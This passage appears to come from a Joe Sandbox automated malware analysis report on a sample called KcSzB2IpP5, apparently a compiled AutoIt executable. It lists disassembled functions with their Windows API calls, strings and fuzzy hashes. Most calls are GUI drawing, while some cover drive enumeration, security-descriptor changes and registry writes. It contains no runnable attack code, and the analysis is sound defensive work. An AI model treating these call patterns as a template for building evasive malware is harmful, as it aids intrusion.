Instruction ID: 7ae6fd743d1631602eb0375510453723ede294755228366ebe5bb47a7625adc9
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 8B019D78A00219EFCB98DF98C5909AEF7F5FB98310F208599E849A7301D730AE41DB80

Function 01025F88 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1334121532.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 004F70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 004F712F
GetSysColorBrush.USER32(0000000F), ref: 004F7160
GetSysColor.USER32(0000000F), ref: 004F716C
SetBkColor.GDI32(?,000000FF), ref: 004F7186
SelectObject.GDI32(?,?), ref: 004F7195
InflateRect.USER32(?,000000FF,000000FF), ref: 004F71C0
GetSysColor.USER32(00000010), ref: 004F71C8
CreateSolidBrush.GDI32(00000000), ref: 004F71CF
FrameRect.USER32(?,?,00000000), ref: 004F71DE
DeleteObject.GDI32(00000000), ref: 004F71E5
InflateRect.USER32(?,000000FE,000000FE), ref: 004F7230
FillRect.USER32(?,?,?), ref: 004F7262
GetWindowLongW.USER32(?,000000F0), ref: 004F7284

Part of subcall function 004F73E8: GetSysColor.USER32(00000012), ref: 004F7421
Part of subcall function 004F73E8: SetTextColor.GDI32(?,?), ref: 004F7425
Part of subcall function 004F73E8: GetSysColorBrush.USER32(0000000F), ref: 004F743B
Part of subcall function 004F73E8: GetSysColor.USER32(0000000F), ref: 004F7446
Part of subcall function 004F73E8: GetSysColor.USER32(00000011), ref: 004F7463
Part of subcall function 004F73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004F7471
Part of subcall function 004F73E8: SelectObject.GDI32(?,00000000), ref: 004F7482
Part of subcall function 004F73E8: SetBkColor.GDI32(?,00000000), ref: 004F748B
Part of subcall function 004F73E8: SelectObject.GDI32(?,?), ref: 004F7498
Part of subcall function 004F73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 004F74B7
Part of subcall function 004F73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004F74CE
Part of subcall function 004F73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 004F74DB

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 7e0ed46ee7e601b9e76521c001bf931de53aec70f9a3f182a46fa3cd1d216cfb
Instruction ID: af1e9748e13dd239b19f90c5089f58886c1ff10b84c718d28f678bc8ee43e61b
Opcode Fuzzy Hash: 7e0ed46ee7e601b9e76521c001bf931de53aec70f9a3f182a46fa3cd1d216cfb
Instruction Fuzzy Hash: D1A1B372008319BFD7009F60DD88E7B7BA9FF49320F101A29FA62961E1D738E955CB56

Function 00478D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00478E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 004B6AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 004B6AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004B6F43

Part of subcall function 00478F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00478BE8,?,00000000,?,?,?,?,00478BBA,00000000,?), ref: 00478FC5

SendMessageW.USER32(?,00001053), ref: 004B6F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 004B6F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 004B6FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 004B6FB7

Strings

0, xrefs: 004B6DCF

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 5b7e3e395f604cc33d0ace2aef75de706b5d710659019cbfd632566f0644c34f
Instruction ID: c2527fe8d326a55295adfc702db16258bbbd0e734fa027af1a64d1bceafd1d6b
Opcode Fuzzy Hash: 5b7e3e395f604cc33d0ace2aef75de706b5d710659019cbfd632566f0644c34f
Instruction Fuzzy Hash: CE129C31604611EFD725CF24C988BFABBB5FB44300F15846EE489CB261CB39E856DB69

Function 004E2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 004E273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004E286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 004E28A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 004E28B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 004E2900
GetClientRect.USER32(00000000,?), ref: 004E290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 004E2955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004E2964
GetStockObject.GDI32(00000011), ref: 004E2974
SelectObject.GDI32(00000000,00000000), ref: 004E2978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 004E2988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004E2991
DeleteDC.GDI32(00000000), ref: 004E299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004E29C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 004E29DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 004E2A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 004E2A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 004E2A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 004E2A77
GetStockObject.GDI32(00000011), ref: 004E2A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004E2A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 004E2A97

Strings

DISPLAY, xrefs: 004E295A
msctls_progress32, xrefs: 004E2A13
AutoIt v3, xrefs: 004E28F8
static, xrefs: 004E294F, 004E2A71

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 0223406d1a74f6b3feed1eebefc2807dbd103c47fbc317d0b18fcc9fbd46b4a8
Instruction ID: 30025010fc2636475db7f9f7eadde0cf06f2754dc50fdbe60213b52dcf9c1ea5
Opcode Fuzzy Hash: 0223406d1a74f6b3feed1eebefc2807dbd103c47fbc317d0b18fcc9fbd46b4a8
Instruction Fuzzy Hash: 24B17C71A00219AFEB10DFA9CD85FAF7BA9EB08715F004519F915E7290D7B4ED40CBA8

Function 004D4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004D4AED
GetDriveTypeW.KERNEL32(?,004FCB68,?,\\.\,004FCC08), ref: 004D4BCA
SetErrorMode.KERNEL32(00000000,004FCB68,?,\\.\,004FCC08), ref: 004D4D36

Strings

\\.\, xrefs: 004D4B3F
Fixed, xrefs: 004D4C09
SCSI, xrefs: 004D4C8A
FileBackedVirtual, xrefs: 004D4CEC
SSD, xrefs: 004D4C4A
ATAPI, xrefs: 004D4C91
Virtual, xrefs: 004D4CE5
Unknown, xrefs: 004D4BED, 004D4C83
SSA, xrefs: 004D4CA6
1394, xrefs: 004D4C9F
Removable, xrefs: 004D4C10, 004D4C15
USB, xrefs: 004D4CB4
Network, xrefs: 004D4C02
iSCSI, xrefs: 004D4CC2
MMC, xrefs: 004D4CDE
SATA, xrefs: 004D4CD0
SAS, xrefs: 004D4CC9
Fibre, xrefs: 004D4CAD
PhysicalDrive, xrefs: 004D4B76
RAID, xrefs: 004D4CBB
CDROM, xrefs: 004D4BFB
RAMDisk, xrefs: 004D4BF4
ATA, xrefs: 004D4C98

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 6564b4f822a01e8fe81ca8c06edcab31de5b9ea19bac2fa1d6ea9cad000058a0
Instruction ID: e55786dcd75d027e6324c58679a11e326ecb12601dc614f17961e5273de7f0e1
Opcode Fuzzy Hash: 6564b4f822a01e8fe81ca8c06edcab31de5b9ea19bac2fa1d6ea9cad000058a0
Instruction Fuzzy Hash: AC61D1307161099BCB04DF24DAA19797BB1BF85B08B21401BF807AB791DB3DED42DB5A

Function 004F73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 004F7421
SetTextColor.GDI32(?,?), ref: 004F7425
GetSysColorBrush.USER32(0000000F), ref: 004F743B
GetSysColor.USER32(0000000F), ref: 004F7446
CreateSolidBrush.GDI32(?), ref: 004F744B
GetSysColor.USER32(00000011), ref: 004F7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 004F7471
SelectObject.GDI32(?,00000000), ref: 004F7482
SetBkColor.GDI32(?,00000000), ref: 004F748B
SelectObject.GDI32(?,?), ref: 004F7498
InflateRect.USER32(?,000000FF,000000FF), ref: 004F74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004F74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 004F74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004F752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 004F7554
InflateRect.USER32(?,000000FD,000000FD), ref: 004F7572
DrawFocusRect.USER32(?,?), ref: 004F757D
GetSysColor.USER32(00000011), ref: 004F758E
SetTextColor.GDI32(?,00000000), ref: 004F7596
DrawTextW.USER32(?,004F70F5,000000FF,?,00000000), ref: 004F75A8
SelectObject.GDI32(?,?), ref: 004F75BF
DeleteObject.GDI32(?), ref: 004F75CA
SelectObject.GDI32(?,?), ref: 004F75D0
DeleteObject.GDI32(?), ref: 004F75D5
SetTextColor.GDI32(?,?), ref: 004F75DB
SetBkColor.GDI32(?,?), ref: 004F75E5

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: fec6ee7847e8d5dc6553b4d3c2dc853727855ecf8251d8666160c5f0c16fef2e
Instruction ID: 5542cecd5873b47fec005fc5464e86d68eeb72822c2327173d50f5ef4a308154
Opcode Fuzzy Hash: fec6ee7847e8d5dc6553b4d3c2dc853727855ecf8251d8666160c5f0c16fef2e
Instruction Fuzzy Hash: F0614E7290421CBFDB019FA4DD89EEE7FB9EB08320F114125FA15AB2A1D7789950CF94

Function 004F0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004F1128
GetDesktopWindow.USER32 ref: 004F113D
GetWindowRect.USER32(00000000), ref: 004F1144
GetWindowLongW.USER32(?,000000F0), ref: 004F1199
DestroyWindow.USER32(?), ref: 004F11B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004F11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004F120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004F121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 004F1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 004F1245
IsWindowVisible.USER32(00000000), ref: 004F12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 004F12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 004F12D0
GetWindowRect.USER32(00000000,?), ref: 004F12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 004F130E
GetMonitorInfoW.USER32(00000000,?), ref: 004F1328
CopyRect.USER32(?,?), ref: 004F133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 004F13AA

Strings

0, xrefs: 004F10D3
(, xrefs: 004F131B
tooltips_class32, xrefs: 004F11E6

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: a8d63dc1ad47c68990646f8f62cabf6b3c5b977d7058c591875e12688d6401ae
Instruction ID: 75b450424bd2f24dd70efa9f2befbd711f4a9a5f515c0cf962763ff031a2755d
Opcode Fuzzy Hash: a8d63dc1ad47c68990646f8f62cabf6b3c5b977d7058c591875e12688d6401ae
Instruction Fuzzy Hash: A8B19C71608345EFD700DF65C984A6BBBE4FF88344F00891EFA899B261D774E844CB9A

Function 004F0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004F02E5
_wcslen.LIBCMT ref: 004F031F
_wcslen.LIBCMT ref: 004F0389
_wcslen.LIBCMT ref: 004F03F1
_wcslen.LIBCMT ref: 004F0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004F04C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004F0504

Part of subcall function 0047F9F2: _wcslen.LIBCMT ref: 0047F9FD

Part of subcall function 004C223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004C2258
Part of subcall function 004C223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004C228A

Strings

GETSELECTEDCOUNT, xrefs: 004F0470, 004F048B
FINDITEM, xrefs: 004F0627
GETITEMCOUNT, xrefs: 004F0316, 004F0337
VIEWCHANGE, xrefs: 004F0675
SELECTALL, xrefs: 004F0515
DESELECT, xrefs: 004F059C
GETSELECTED, xrefs: 004F05E1
SELECT, xrefs: 004F0548
GETTEXT, xrefs: 004F03EC, 004F0407
SELECTCLEAR, xrefs: 004F052D
ISSELECTED, xrefs: 004F04DD
SELECTINVERT, xrefs: 004F057E
GETSUBITEMCOUNT, xrefs: 004F0384, 004F039F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 7b9c8ca5f59d4e9b25935225c931a8e86875c60d5caac245368a05ef81720d47
Instruction ID: 11c697a8c0c8cee34b75b0e89641f19e0350625e8ef5c7007111ade78d9dda7a
Opcode Fuzzy Hash: 7b9c8ca5f59d4e9b25935225c931a8e86875c60d5caac245368a05ef81720d47
Instruction Fuzzy Hash: 52E1D0312082059FC714DF25C55087BB7E6BFC8318B10495EF996AB3A2DB38ED45CB4A

Function 00478891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00478968
GetSystemMetrics.USER32(00000007), ref: 00478970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0047899B
GetSystemMetrics.USER32(00000008), ref: 004789A3
GetSystemMetrics.USER32(00000004), ref: 004789C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004789E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004789F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00478A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00478A3C
GetClientRect.USER32(00000000,000000FF), ref: 00478A5A
GetStockObject.GDI32(00000011), ref: 00478A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00478A81

Part of subcall function 0047912D: GetCursorPos.USER32(?), ref: 00479141
Part of subcall function 0047912D: ScreenToClient.USER32(00000000,?), ref: 0047915E
Part of subcall function 0047912D: GetAsyncKeyState.USER32(00000001), ref: 00479183
Part of subcall function 0047912D: GetAsyncKeyState.USER32(00000002), ref: 0047919D

SetTimer.USER32(00000000,00000000,00000028,004790FC), ref: 00478AA8

Strings

AutoIt v3 GUI, xrefs: 00478A20

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: c4a37b24dac13543a4b0d0530a9ffaf8f710df638a65f490493117bded0958cc
Instruction ID: 60f3a0188ea719384d0885e4492e65df39cc083bb6233127d09d70cc76febd54
Opcode Fuzzy Hash: c4a37b24dac13543a4b0d0530a9ffaf8f710df638a65f490493117bded0958cc
Instruction Fuzzy Hash: 30B17071A00209AFDB14DF68CD89BEE7BB5FB48314F11412AFA1597290DB38E851CF69

Function 004C0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004C10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004C1114
Part of subcall function 004C10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,004C0B9B,?,?,?), ref: 004C1120
Part of subcall function 004C10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004C0B9B,?,?,?), ref: 004C112F
Part of subcall function 004C10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004C0B9B,?,?,?), ref: 004C1136
Part of subcall function 004C10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004C114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004C0DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004C0E29
GetLengthSid.ADVAPI32(?), ref: 004C0E40
GetAce.ADVAPI32(?,00000000,?), ref: 004C0E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004C0E96
GetLengthSid.ADVAPI32(?), ref: 004C0EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 004C0EB5
HeapAlloc.KERNEL32(00000000), ref: 004C0EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 004C0EDD
CopySid.ADVAPI32(00000000), ref: 004C0EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004C0F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004C0F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 004C0F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004C0F6E
HeapFree.KERNEL32(00000000), ref: 004C0F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004C0F7E
HeapFree.KERNEL32(00000000), ref: 004C0F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004C0F8E
HeapFree.KERNEL32(00000000), ref: 004C0F95
GetProcessHeap.KERNEL32(00000000,?), ref: 004C0FA1
HeapFree.KERNEL32(00000000), ref: 004C0FA8

Part of subcall function 004C1193: GetProcessHeap.KERNEL32(00000008,004C0BB1,?,00000000,?,004C0BB1,?), ref: 004C11A1
Part of subcall function 004C1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,004C0BB1,?), ref: 004C11A8
Part of subcall function 004C1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004C0BB1,?), ref: 004C11B7

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 8f8435147578f6a5d8d19e62e359d7bc21d297db96fae4b10eefd3305a47c251
Instruction ID: c0d2c7fa124c29444748b0c3994f4e66ca0fecdd3371707b4569fde31220c896
Opcode Fuzzy Hash: 8f8435147578f6a5d8d19e62e359d7bc21d297db96fae4b10eefd3305a47c251
Instruction Fuzzy Hash: 50717D7590020AEFDF609FA4DD44FAFBBB8BF05300F04412AF919E6291D7749A55CB68

Function 004EC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004EC4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,004FCC08,00000000,?,00000000,?,?), ref: 004EC544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 004EC5A4
_wcslen.LIBCMT ref: 004EC5F4
_wcslen.LIBCMT ref: 004EC66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 004EC6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 004EC7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 004EC84D
RegCloseKey.ADVAPI32(?), ref: 004EC881
RegCloseKey.ADVAPI32(00000000), ref: 004EC88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 004EC960

Strings

REG_QWORD, xrefs: 004EC8C3
REG_EXPAND_SZ, xrefs: 004EC5CD
REG_DWORD, xrefs: 004EC804
REG_BINARY, xrefs: 004EC913
REG_MULTI_SZ, xrefs: 004EC6F5
REG_SZ, xrefs: 004EC644

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

